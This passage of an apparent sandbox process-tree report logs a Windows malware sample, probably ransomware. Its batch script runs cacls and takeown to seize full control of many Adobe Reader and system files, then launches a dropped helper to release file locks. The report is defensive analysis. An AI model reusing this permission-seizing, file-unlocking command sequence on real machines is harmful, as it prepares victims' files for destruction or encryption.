  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:1228
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    - Modifies file permissions
    PID:528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:1696
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "main.css" -nobanner
    3⤵
    PID:1228
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "main.css" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:1240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:828
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:1432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    - Modifies file permissions
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1228
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:316
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:2000
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:1548
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:528
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:1192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    - Modifies file permissions
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1584
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:1700
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "device.png" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "device.png" -nobanner
      4⤵
      PID:828
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1696
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1428
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:1436
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:1932
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:888
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:1944
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    - Modifies file permissions
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HE0Qzozz.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
      HE0Qzozz.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\HE0Qzozz.exe
    HE0Qzozz.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vGbwRGE.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    - Modifies file permissions
